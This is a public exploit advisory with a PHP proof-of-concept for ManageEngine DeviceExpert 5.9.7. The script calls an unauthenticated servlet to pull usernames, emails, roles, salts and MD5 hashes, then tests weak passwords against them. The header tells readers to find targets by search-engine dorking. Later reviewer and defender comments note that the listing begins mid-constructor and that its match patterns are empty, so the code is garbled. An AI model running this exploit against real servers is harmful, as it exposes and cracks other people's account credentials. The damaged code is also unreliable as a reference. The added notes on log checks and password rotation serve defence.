====================================================================================================================================
| # Title : DeviceExpert v 5.9.7 build 5970 PHP extracts Credentials Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |
| # Vendor : https://manageengine.com/ |
====================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] This PHP COde extracts usernames and salted MD5 password hashes from ManageEngine DeviceExpert version 5.9 build 5980 and prior.
[+] LIne 87 set your targer .
[+] usage : C:\www\test>php 3.php
[+] Payload :

// NOTE(review): this copy of the listing starts in the middle of the constructor; the
// opening PHP tag, the class declaration and the constructor signature are not on the page.
host = $host;
        $this->port = $port;
        $this->ssl = $ssl;
    }

    /**
     * Issues one HTTP(S) request for $path on the configured host and port and
     * returns whatever curl_exec() hands back.
     *
     * Only CURLOPT_RETURNTRANSFER is set on the handle, so the request carries no
     * credentials, cookie or token. No timeout is set and no cURL error is inspected;
     * the caller treats any falsy return value as a failed connection.
     *
     * @param string $path Path appended after host:port.
     * @return string|false Response body, or false when curl_exec() fails.
     */
    private function sendRequest($path) {
        // Scheme is chosen from the ssl flag; host, port and path are concatenated as-is.
        $url = ($this->ssl ? 'https://' : 'http://') . $this->host . ':' . $this->port . $path;
        $ch = curl_init($url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        $response = curl_exec($ch);
        curl_close($ch);
        return $response;
    }

    /**
     * Requests /ReadUsersFromMasterServlet and returns the matched user records.
     *
     * Defender note: the response is obtained through sendRequest(), i.e. without any
     * authentication material. Requests for this servlet path in the product's access
     * logs are therefore the event to look for when checking for exposure, and the
     * management interface should not be reachable from untrusted networks.
     *
     * NOTE(review): the strpos() needle is empty and the pattern holds only a closing
     * tag, so the literals look incomplete in this copy (likely lost when the page was
     * extracted). Treat the listing as a damaged transcript, not verbatim code.
     *
     * @return array|null Full pattern matches ($matches[0]), or null when the request
     *                    returns a falsy value or the strpos() check does not pass.
     */
    public function getUsers() {
        echo "Reading users from master...\n";
        $response = $this->sendRequest('/ReadUsersFromMasterServlet');
        if (!$response) {
            echo "Connection failed\n";
            return null;
        }
        if (strpos($response, '') !== false) {
            preg_match_all('/(.*?)<\/discoverydata>/', $response, $matches);
            echo "Found " . count($matches[0]) . " users\n";
            return $matches[0];
        } else {
            echo "Could not find any users\n";
            return null;
        }
    }

    /**
     * Pulls the account fields out of one user record and tests the stored hash
     * against a four-entry guess list.
     *
     * NOTE(review): the patterns below contain only closing tags, so they look
     * incomplete in this copy of the listing. The preg_match() results are also used
     * without checking that a match was found.
     *
     * @param string $user One record as returned by getUsers().
     * @return array|null Keys username, password, hash, role, email, salt; null when
     *                    $user is empty. 'password' stays null when no guess matches.
     */
    public function parseUserData($user) {
        if (!$user) return null;
        preg_match('/([^<]+)<\/username>/', $user, $username);
        preg_match('/([^<]+)<\/password>/', $user, $encoded_hash);
        preg_match('/([^<]+)<\/userrole>/', $user, $role);
        preg_match('/([^<]+)<\/emailid>/', $user, $email);
        preg_match('/([^<]+)<\/saltvalue>/', $user, $salt);
        // The password field is base64-decoded here and rendered as hex below.
        $hash = base64_decode($encoded_hash[1]);
        $password = null;
        // Guess list: three fixed strings plus the account's own username.
        $weak_passwords = ['12345', 'admin', 'password', $username[1]];
        foreach ($weak_passwords as $weak_password) {
            // The check is md5(guess . salt) against the stored value: a single MD5 round
            // whose salt arrives in the same record. Hashes of this form are cheap to test
            // offline, so every password in an exposed record should be treated as
            // compromised and rotated, not only the ones this short list happens to match.
            if (md5($weak_password . $salt[1]) == bin2hex($hash)) {
                $password = $weak_password;
                break;
            }
        }
        return [
            'username' => $username[1],
            'password' => $password,
            'hash' => bin2hex($hash),
            'role' => $role[1],
            'email' => $email[1],
            'salt' => $salt[1]
        ];
    }

    /**
     * Fetches the records via getUsers() and prints username, recovered password
     * (or 'Not found'), hash, role, e-mail and salt for each one.
     *
     * @return void
     */
    public function run() {
        $users = $this->getUsers();
        if (!$users) return;
        foreach ($users as $user) {
            $user_data = $this->parseUserData($user);
            if (!$user_data) continue;
            echo "User: " . $user_data['username'] . "\n";
            // 'password' is null unless one of the guesses matched the hash.
            echo "Password: " . ($user_data['password'] ? $user_data['password'] : 'Not found') . "\n";
            echo "Hash: " . $user_data['hash'] . "\n";
            echo "Role: " . $user_data['role'] . "\n";
            echo "Email: " . $user_data['email'] . "\n";
            echo "Salt: " . $user_data['salt'] . "\n";
            echo "----------------------------\n";
        }
    }
}

// Using the class
// Instantiated with the loopback address 127.0.0.1 in this copy of the listing.
$deviceExpert = new ManageEngineDeviceExpert('127.0.0.1');
$deviceExpert->run();
?>

Greetings to :==================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |
================================================================